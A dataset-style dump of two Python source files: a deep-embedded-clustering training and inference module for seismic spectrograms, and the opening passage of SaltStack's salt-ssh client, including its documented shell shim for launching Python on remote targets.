source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
models.py | #!/usr/bin/env python3
'''Contains necessary functions, routines, and data recording for DEC model
initialization, training, validation, and inference.
William Jenkins, wjenkins [at] ucsd [dot] edu
Scripps Institution of Oceanography, UC San Diego
May 2021
'''
from datetime import datetime
import threading
import os
import shutil
import sys
import matplotlib.pyplot as plt
import numpy as np
np.set_printoptions(threshold=sys.maxsize)
if sys.platform == 'darwin':
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
elif sys.platform == 'linux':
#CUML requires a gpu
print("warning running CPU version which excludes cuml, will need to install with CUML if using GPU acceleration")
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
#from cuml import KMeans, TSNE
from sklearn.metrics import silhouette_score
from sklearn.mixture import GaussianMixture
import torch
from torch.utils.data import Dataset, DataLoader
from torch.utils.tensorboard import SummaryWriter
import torchvision
from tqdm import tqdm
from RISCluster import plotting, utils
def pretrain(
model,
dataloaders,
criteria,
optimizer,
batch_size,
lr,
parameters
):
'''Pre-trains DEC model (i.e., trains AEC).
Parameters
----------
model : PyTorch model instance
Model with untrained parameters
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
criteria : PyTorch loss function instances
Error metrics
optimizer : PyTorch optimizer instance
batch_size : int
Batch size used in calculations
lr : float
Controls initial learning rate for gradient descent.
parameters : dict
Additional experiment parameters/hyperparameters
Returns
-------
model : PyTorch model instance
Model with trained parameters
Outputs to Disk
---------------
Tensorboard Summary Writer : Records training and validation
Matplotlib Figures : Prints spectrogram reconstructions to disk.
'''
tic = datetime.now()
print('Commencing pre-training...')
n_epochs = parameters['n_epochs']
show = parameters['show']
device = parameters['device']
mode = parameters['mode']
savepath_exp = parameters['savepath']
fname_dataset = parameters['fname_dataset']
show = parameters['show']
early_stopping = parameters['early_stopping']
patience = parameters['patience']
km_metrics = parameters['km_metrics']
disp_index = parameters['img_index']
disp_index = [int(i) for i in disp_index.split(',')]
tbpid = parameters['tbpid']
savepath_run, serial_run, savepath_chkpnt = utils.init_output_env(
savepath_exp,
mode,
**{
'batch_size': batch_size,
'lr': lr
}
)
criterion_mse = criteria[0]
tra_loader = dataloaders[0]
val_loader = dataloaders[1]
tb = SummaryWriter(log_dir=savepath_run)
if tbpid is not None:
tb.add_text(
"Tensorboard PID",
f"To terminate this TB instance, kill PID: {tbpid}",
global_step=None
)
tb.add_text("Path to Saved Outputs", savepath_run, global_step=None)
fig = plotting.compare_images(
model,
0,
disp_index,
fname_dataset,
device,
T_seg = parameters["T_seg"],
savepath=savepath_run,
show=show,
)
tb.add_figure(
'TrainingProgress',
fig,
global_step=0,
close=True
)
if early_stopping:
best_val_loss = 10000
epochs = list()
tra_losses = list()
val_losses = list()
finished = False
for epoch in range(n_epochs):
print('-' * 100)
print(
f'Epoch [{epoch+1}/{n_epochs}] | '
f'Batch Size = {batch_size} | LR = {lr}'
)
# ==== Training Loop: =================================================
model.train(True)
running_tra_mse = 0.0
running_size = 0
pbar_tra = tqdm(
tra_loader,
leave=True,
desc=" Training",
unit="batch",
postfix={"MSE": "%.6f" % 0.0},
bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
)
for batch in pbar_tra:
_, batch = batch
x = batch.to(device)
optimizer.zero_grad()
with torch.set_grad_enabled(True):
x_rec, _ = model(x)
loss_mse = criterion_mse(x_rec, x)
loss_mse.backward()
optimizer.step()
running_tra_mse += loss_mse.cpu().detach().numpy() * x.size(0)
running_size += x.size(0)
pbar_tra.set_postfix(
MSE = f"{(running_tra_mse / running_size):.4e}"
)
epoch_tra_mse = running_tra_mse / len(tra_loader.dataset)
tb.add_scalar('Training MSE', epoch_tra_mse, epoch)
for name, weight in model.named_parameters():
tb.add_histogram(name, weight, epoch)
tb.add_histogram(f'{name}.grad', weight.grad, epoch)
if (epoch % 5) == 0 and not (epoch == 0):
fig = plotting.compare_images(
model,
epoch,
disp_index,
fname_dataset,
device,
T_seg=parameters["T_seg"],
savepath=savepath_run,
show=show,
)
tb.add_figure(
'TrainingProgress',
fig,
global_step=epoch,
close=True
)
# ==== Validation Loop: ===============================================
model.train(False)
running_val_mse = 0.0
running_size = 0
pbar_val = tqdm(
val_loader,
leave=True,
desc="Validation",
unit="batch",
postfix={"MSE": "%.6f" % 0.0},
bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
)
for batch in pbar_val:
_, batch = batch
x = batch.to(device)
model.eval()
with torch.no_grad():
# x = batch.to(device)
x_rec, _ = model(x)
loss_mse = criterion_mse(x_rec, x)
running_val_mse += loss_mse.cpu().detach().numpy() * x.size(0)
running_size += x.size(0)
pbar_val.set_postfix(
MSE = f"{(running_val_mse / running_size):.4e}"
)
epoch_val_mse = running_val_mse / len(val_loader.dataset)
tb.add_scalar('Validation MSE', epoch_val_mse, epoch)
epochs, tra_losses, val_losses = utils.add_to_history(
[epochs, tra_losses, val_losses],
[epoch, epoch_tra_mse, epoch_val_mse]
)
if early_stopping:
if epoch_val_mse < best_val_loss:
strikes = 0
best_val_loss = epoch_val_mse
fname = f'{savepath_chkpnt}/AEC_Best_Weights.pt'
torch.save(model.state_dict(), fname)
else:
if epoch == 0:
strikes = 1
else:
strikes += 1
if epoch > patience and strikes > patience:
print('Stopping Early.')
finished = True
break
else:
fname = f'{savepath_chkpnt}/AEC_Params_{epoch:03d}.pt'
torch.save(model.state_dict(), fname)
_ = utils.save_history(
{
'Epoch': epochs,
'Training Loss': tra_losses,
'Validation Loss': val_losses
},
f"{savepath_run}/AEC_history.csv"
)
fig2 = plotting.view_history_AEC(f"{savepath_run}/AEC_history.csv")
fig2.savefig(f"{savepath_run}/AEC_history.png", dpi=300, facecolor='w')
tb.add_hparams(
{'Batch Size': batch_size, 'LR': lr},
{
'hp/Training MSE': epoch_tra_mse,
'hp/Validation MSE': epoch_val_mse
}
)
fig = plotting.compare_images(
model,
epoch,
disp_index,
fname_dataset,
device,
T_seg=parameters["T_seg"],
savepath=savepath_run,
show=show
)
tb.add_figure(
'TrainingProgress',
fig,
global_step=epoch,
close=True
)
fname = f'{savepath_run}/AEC_Params_Final.pt'
if early_stopping and (finished == True or epoch == n_epochs-1):
src_file = f'{savepath_chkpnt}/AEC_Best_Weights.pt'
shutil.move(src_file, fname)
else:
torch.save(model.state_dict(), fname)
tb.add_text("Path to Saved Weights", fname, global_step=None)
print('AEC parameters saved.')
toc = datetime.now()
print(f'Pre-training complete at {toc}; time elapsed = {toc-tic}.')
if km_metrics:
klist = parameters['klist']
klist = np.arange(int(klist.split(',')[0]), int(klist.split(',')[1])+1)
print('-' * 62)
print("Calculating optimal cluster size...")
inertia, silh, gap_g, gap_u = kmeans_metrics(
tra_loader,
model,
device,
klist
)
fig = plotting.view_cluster_stats(klist, inertia, silh, gap_g, gap_u)
plt.savefig(f'{savepath_run}/KMeans_Metrics.png', dpi=300)
print("K-means statistics complete; figure saved.")
tb.add_figure('K-Means Metrics', fig, global_step=None, close=True)
tb.close()
return model
def train(
model,
dataloader,
criteria,
optimizer,
n_clusters,
batch_size,
lr,
gamma,
tol,
index_tra,
parameters,
T_seg="4.0"
):
'''Trains DEC model & performs clustering.
Parameters
----------
model : PyTorch model instance
Model with untrained parameters
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
criteria : PyTorch loss function instances
Error metrics
optimizer : PyTorch optimizer instance
n_clusters : int
Number of clusters
batch_size : int
Batch size used in calculations
lr : float
Controls initial learning rate for gradient descent.
gamma : float
Hyperparameter that controls contribution of clustering loss to total
loss.
tol : float
Threshold at which DEC stops.
index_tra: array
Indeces of data samples to be used for DEC training.
parameters : dict
Additional experiment parameters/hyperparameters
Returns
-------
model : PyTorch model instance
Model with trained parameters
Outputs to Disk
---------------
Tensorboard Summary Writer : Records training and clustering
Matplotlib Figures : Prints DEC figures to disk.
'''
tic = datetime.now()
print('Commencing training...')
# Unpack parameters:
device = parameters['device']
n_epochs = parameters['n_epochs']
update_interval = parameters['update_interval']
savepath_exp = parameters['savepath']
show = parameters['show']
mode = parameters['mode']
loadpath = parameters['saved_weights']
fname_dataset = parameters['fname_dataset']
tbpid = parameters['tbpid']
init = parameters['init']
savepath_run, serial_run = utils.init_output_env(
savepath_exp,
mode,
**{
'n_clusters': n_clusters,
'batch_size': batch_size,
'lr': lr,
'gamma': gamma,
'tol': tol
}
)
fignames = [
'T-SNE',
'Gallery',
'DistMatrix',
'LatentSpace',
'CDF',
'PDF'
]
figpaths = [utils.make_dir(fignames[i], savepath_run) for i in range(len(fignames))]
model.load_state_dict(
torch.load(loadpath, map_location=device), strict=False
)
model.eval()
criterion_mse = criteria[0]
criterion_kld = criteria[1]
M = len(dataloader.dataset)
if update_interval == -1:
update_interval = int(np.ceil(M / (batch_size * 2)))
tb = SummaryWriter(log_dir = savepath_run)
if tbpid is not None:
tb.add_text(
"Tensorboard PID",
f"To terminate this TB instance, kill PID: {tbpid}",
global_step=None
)
tb.add_text("Path to Saved Outputs", savepath_run, global_step=None)
# Initialize Clusters:
if init == "kmeans": # K-Means Initialization:
print('Initiating clusters with k-means...', end="", flush=True)
labels_prev, centroids = kmeans(model, dataloader, device)
elif init == "gmm": # GMM Initialization:
print('Initiating clusters with GMM...', end="", flush=True)
labels_prev, centroids = gmm(model, dataloader, device)
cluster_centers = torch.from_numpy(centroids).to(device)
with torch.no_grad():
model.state_dict()["clustering.weights"].copy_(cluster_centers)
fname = f'{savepath_run}/DEC_Params_Initial.pt'
torch.save(model.state_dict(), fname)
print('complete.')
# Initialize Target Distribution:
q, _, z_array0 = infer(dataloader, model, device) # <-- The CUDA problem occurs in here
p = target_distribution(q)
epoch = 0
tsne_results = tsne(z_array0)
plotargs = (
fignames,
figpaths,
tb,
model,
dataloader,
device,
fname_dataset,
index_tra,
z_array0,
z_array0,
labels_prev,
labels_prev,
centroids,
centroids,
tsne_results,
epoch,
show,
T_seg
)
plot_process = threading.Thread(target=plotting.plotter_mp, args=plotargs)
plot_process.start()
iters = list()
rec_losses = list()
clust_losses = list()
total_losses = list()
deltas_iter = list()
deltas = list()
n_iter = 1
finished = False
for epoch in range(n_epochs):
print('-' * 110)
print(
f'Epoch [{epoch+1}/{n_epochs}] | '
f'# Clusters = {n_clusters} | '
f'Batch Size = {batch_size} | '
f'LR = {lr} | '
f'gamma = {gamma} | '
f'tol = {tol}'
)
running_loss = 0.0
running_loss_rec = 0.0
running_loss_clust = 0.0
running_size = 0
# batch_num = 0
pbar = tqdm(
dataloader,
leave=True,
unit="batch",
postfix={
"MSE": "%.6f" % 0.0,
"KLD": "%.6f" % 0.0,
"Loss": "%.6f" % 0.0
},
bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
)
# Iterate over data:
for batch_num, batch in enumerate(pbar):
_, batch = batch
x = batch.to(device)
# Update target distribution, check performance
if (batch_num % update_interval == 0) and not \
(batch_num == 0 and epoch == 0):
q, labels, _ = infer(dataloader, model, device)
p = target_distribution(q)
# check stop criterion
delta_label = np.sum(labels != labels_prev).astype(np.float32)\
/ labels.shape[0]
deltas_iter, deltas = utils.add_to_history(
[deltas_iter, deltas],
[n_iter, delta_label]
)
# deltas.append(delta_label)
tb.add_scalar('delta', delta_label, n_iter)
labels_prev = np.copy(labels)
if delta_label < tol:
print('Stop criterion met, training complete.')
finished = True
break
tar_dist = p[running_size:(running_size + x.size(0)), :]
tar_dist = torch.from_numpy(tar_dist).to(device)
# zero the parameter gradients
model.train()
optimizer.zero_grad()
# Calculate losses and backpropagate
with torch.set_grad_enabled(True):
q, x_rec, _ = model(x)
loss_rec = criterion_mse(x_rec, x)
loss_clust = gamma * criterion_kld(torch.log(q), tar_dist) \
/ x.size(0)
loss = loss_rec + loss_clust
loss.backward()
optimizer.step()
running_size += x.size(0)
running_loss += loss.detach().cpu().numpy() * x.size(0)
running_loss_rec += loss_rec.detach().cpu().numpy() * x.size(0)
running_loss_clust += loss_clust.detach().cpu().numpy() * x.size(0)
accum_loss = running_loss / running_size
accum_loss_rec = running_loss_rec / running_size
accum_loss_clust = running_loss_clust / running_size
pbar.set_postfix(
MSE = f"{accum_loss_rec:.4e}",
KLD = f"{accum_loss_clust:.4e}",
Loss = f"{accum_loss:.4e}"
)
iters, rec_losses, clust_losses, total_losses = \
utils.add_to_history(
[iters, rec_losses, clust_losses, total_losses],
[n_iter, accum_loss_rec, accum_loss_clust, accum_loss]
)
tb.add_scalars(
'Losses',
{
'Loss': accum_loss,
'MSE': accum_loss_rec,
'KLD': accum_loss_clust
},
n_iter
)
tb.add_scalar('Loss', accum_loss, n_iter)
tb.add_scalar('MSE', accum_loss_rec, n_iter)
tb.add_scalar('KLD', accum_loss_clust, n_iter)
for name, weight in model.named_parameters():
tb.add_histogram(name, weight, n_iter)
tb.add_histogram(f'{name}.grad', weight.grad, n_iter)
n_iter += 1
if ((epoch % 4 == 0) and not (epoch == 0)) or finished:
_, _, z_array1 = infer(dataloader, model, device)
tsne_results = tsne(z_array1)
plotargs = (
fignames,
figpaths,
tb,
model,
dataloader,
device,
fname_dataset,
index_tra,
z_array0,
z_array1,
labels_prev,
labels,
centroids,
model.clustering.weights.detach().cpu().numpy(),
tsne_results,
epoch,
show,
T_seg
)
plot_process = threading.Thread(
target=plotting.plotter_mp,
args=plotargs
)
plot_process.start()
if finished:
break
_ = utils.save_history(
{
'Iteration': iters,
'Reconstruction Loss': rec_losses,
'Clustering Loss': clust_losses,
'Total Loss': total_losses
},
f"{savepath_run}/DEC_history.csv"
)
_ = utils.save_history(
{
'Iteration': deltas_iter,
'Delta': deltas
},
f"{savepath_run}/Delta_history.csv"
)
tb.add_hparams(
{
'Clusters': n_clusters,
'Batch Size': batch_size,
'LR': lr,
'gamma': gamma,
'tol': tol},
{
'hp/MSE': accum_loss_rec,
'hp/KLD': accum_loss_clust,
'hp/Loss': accum_loss
}
)
fname = f'{savepath_run}/DEC_Params_Final.pt'
torch.save(model.state_dict(), fname)
tb.add_text("Path to Saved Weights", fname, global_step=None)
tb.close()
print('DEC parameters saved.')
toc = datetime.now()
print(f'Pre-training complete at {toc}; time elapsed = {toc-tic}.')
return model
def predict(model, dataloader, parameters):
'''Run DEC model in inference mode.
Parameters
----------
model : PyTorch model instance
Model with trained parameters
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
parameters : dict
Additional experiment parameters/hyperparameters
Outputs to Disk
---------------
Catalogue of class labels for each data sample.
'''
device = parameters['device']
loadpath = parameters['saved_weights']
savepath = os.path.dirname(loadpath)
model.load_state_dict(torch.load(loadpath, map_location=device))
model.eval()
pbar = tqdm(
dataloader,
leave=True,
desc="Saving cluster labels",
unit="batch",
bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
)
for batch in pbar:
idx, batch = batch
x = batch.to(device)
_, labels, _ = model(x)
A = [{
'idx': idx[i].cpu().detach().numpy(),
'label': labels[i].cpu().detach().numpy()
} for i in range(x.size(0))]
utils.save_labels(
[{k: v for k, v in d.items() if \
(k == 'idx' or k == 'label')} for d in A],
savepath
)
def kmeans(model, dataloader, device):
'''Initiate clusters using k-means algorithm.
Parameters
----------
model : PyTorch model instance
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
device : PyTorch device object ('cpu' or 'gpu')
Returns
-------
labels : array (M,)
Sample-wise cluster assignment
centroids : array (n_clusters,)
Cluster centroids
'''
km = KMeans(
n_clusters=model.n_clusters,
max_iter=1000,
n_init=100,
random_state=2009
)
_, _, z_array = infer(dataloader, model, device)
km.fit_predict(z_array)
labels = km.labels_
centroids = km.cluster_centers_
return labels, centroids
def gmm(model, dataloader, device):
'''Initiate clusters using Gaussian mixtures model algorithm.
Parameters
----------
model : PyTorch model instance
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
device : PyTorch device object ('cpu' or 'gpu')
Returns
-------
labels : array (M,)
Sample-wise cluster assignment
centroids : array (n_clusters,)
Cluster centroids
'''
M = len(dataloader.dataset)
_, _, z_array = infer(dataloader, model, device)
# Initialize w/ K-Means
km = KMeans(
n_clusters=model.n_clusters,
max_iter=1000,
n_init=100,
random_state=2009
)
km.fit_predict(z_array)
labels = km.labels_
centroids = km.cluster_centers_
labels, counts = np.unique(labels, return_counts=True)
# Perform EM
gmm_weights = np.empty(len(labels))
for i in range(len(labels)):
gmm_weights[i] = counts[i] / M
GMM = GaussianMixture(
n_components=model.n_clusters,
max_iter=1000,
n_init=1,
weights_init=gmm_weights,
means_init=centroids
)
np.seterr(under='ignore')
labels = GMM.fit_predict(z_array)
centroids = GMM.means_
return labels, centroids
def tsne(data):
'''Perform t-SNE on data.
Parameters
----------
data : array (M,N)
Returns
-------
results : array (M,2)
2-D t-SNE embedding
'''
print('Running t-SNE...', end="", flush=True)
M = len(data)
np.seterr(under='warn')
results = TSNE(
n_components=2,
perplexity=int(M/100),
early_exaggeration=20,
learning_rate=int(M/12),
n_iter=2000,
verbose=0,
random_state=2009
).fit_transform(data.astype('float64'))
print('complete.')
return results
def infer(dataloader, model, device, v=False):
'''Run DEC model in inference mode.
Parameters
----------
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
model : PyTorch model instance
Model with trained parameters
device : PyTorch device object ('cpu' or 'gpu')
v : Boolean (default=False)
Verbose mode
Returns
-------
z_array : array (M,D)
Latent space data (m_samples, d_features)
'''
if v:
notqdm = False
else:
notqdm = True
if hasattr(model, 'n_clusters'):
cflag = True
else:
cflag = False
model.eval()
bsz = dataloader.batch_size
z_array = np.zeros((len(dataloader.dataset), model.clustering.n_features), dtype=np.float32)
if cflag:
q_array = np.zeros((len(dataloader.dataset), model.n_clusters),dtype=np.float32)
# for b, batch in enumerate(tqdm(dataloader, disable=notqdm)):
for b, batch in enumerate(dataloader):
_, batch = batch
x = batch.to(device)
q, _, z = model(x)
q_array[b * bsz:(b*bsz) + x.size(0), :] = q.detach().cpu().numpy()
z_array[b * bsz:(b*bsz) + x.size(0), :] = z.detach().cpu().numpy()
labels = np.argmax(q_array.data, axis=1)
return np.round(q_array, 5), labels, z_array
else:
# for b, batch in enumerate(tqdm(dataloader, disable=notqdm)):
for b, batch in enumerate(dataloader):
x = batch.to(device)
_, z = model(x)
z_array[b * bsz:(b*bsz) + x.size(0), :] = z.detach().cpu().numpy()
return z_array
def target_distribution(q):
'''From Xie/Girshick/Farhadi (2016). Computes the target distribution p,
given soft assignements, q. The target distribtuion is generated by giving
more weight to 'high confidence' samples - those with a higher probability
of being a signed to a certain cluster. This is used in the KL-divergence
loss function.
Parameters
----------
q : array (M,D)
Soft assignement probabilities - Probabilities of each sample being
assigned to each cluster [n_samples, n_features]
Returns
-------
p : array (M,D)
Auxiliary target distribution of shape [n_samples, n_features].
'''
p = q ** 2 / np.sum(q, axis=0)
p = np.transpose(np.transpose(p) / np.sum(p, axis=1))
return np.round(p, 5)
def kmeans_metrics(dataloader, model, device, k_list):
'''Run statistical evaluation on k-means over a range of cluster numbers.
Calculates inertia, gap statistic (uniform and Gaussian), and silhouette
score.
Parameters
----------
dataloader : PyTorch dataloader instance
Loads data from disk into memory.
model : PyTorch model instance
Model with trained parameters
device : PyTorch device object ('cpu' or 'gpu')
k_list : array or list
List of numbers of clusters to evaluate.
Returns
-------
inertia : float
k-means inertia
silh : array
k-means silhouette score
gap_g : float
k-means gap statistic (against uniform distribution)
gap_u : float
k-means gap statistic (against Gaussian distribution)
'''
_, _, z_array = infer(dataloader, model, device)
feat_min = np.min(z_array, axis=0)
feat_max = np.max(z_array, axis=0)
feat_mean = np.mean(z_array, axis=0)
feat_std = np.std(z_array, axis=0)
gauss = np.zeros((z_array.shape[0], z_array.shape[1]))
unifo = np.zeros((z_array.shape[0], z_array.shape[1]))
for i in range(z_array.shape[1]):
gauss[:,i] = np.random.normal(
loc=feat_min[i],
scale=feat_std[i],
size=z_array.shape[0]
)
unifo[:,i] = np.random.uniform(
low=feat_min[i],
high=feat_max[i],
size=z_array.shape[0]
)
inertia = np.zeros(len(k_list))
inertiag = np.zeros(len(k_list))
inertiau = np.zeros(len(k_list))
silh = np.zeros(len(k_list))
silhg = np.zeros(len(k_list))
silhu = np.zeros(len(k_list))
pbar = tqdm(
k_list,
bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}',
desc='Calculating k-means statistics'
)
for i, k in enumerate(pbar):
complete = False
attempt = 0
while not complete:
try:
km = KMeans(n_clusters=k, n_init=100).fit(z_array)
kmg = KMeans(n_clusters=k, n_init=100).fit(gauss)
kmu = KMeans(n_clusters=k, n_init=100).fit(unifo)
inertia[i] = km.inertia_
inertiag[i] = kmg.inertia_
inertiau[i] = kmu.inertia_
silh[i] = silhouette_score(z_array, km.labels_)
complete = True
break
except:
if attempt == 5:
break
complete = False
attempt += 1
continue
gap_g = np.log(np.asarray(inertiag)) - np.log(np.asarray(inertia))
gap_u = np.log(np.asarray(inertiau)) - np.log(np.asarray(inertia))
return inertia, silh, gap_g, gap_u
|
__init__.py | # -*- coding: utf-8 -*-
"""
Create ssh executor system
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
# Import salt libs
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
from salt.utils.platform import is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossibe to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
log = logging.getLogger(__name__)
class SSH(object):
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.",
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate keys.\n\n"
"You can probably resolve this by executing this script with "
"increased permissions via sudo or by running as root.\n"
"You could also use the '-c' option to supply a configuration "
"directory that you have permissions to read and write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
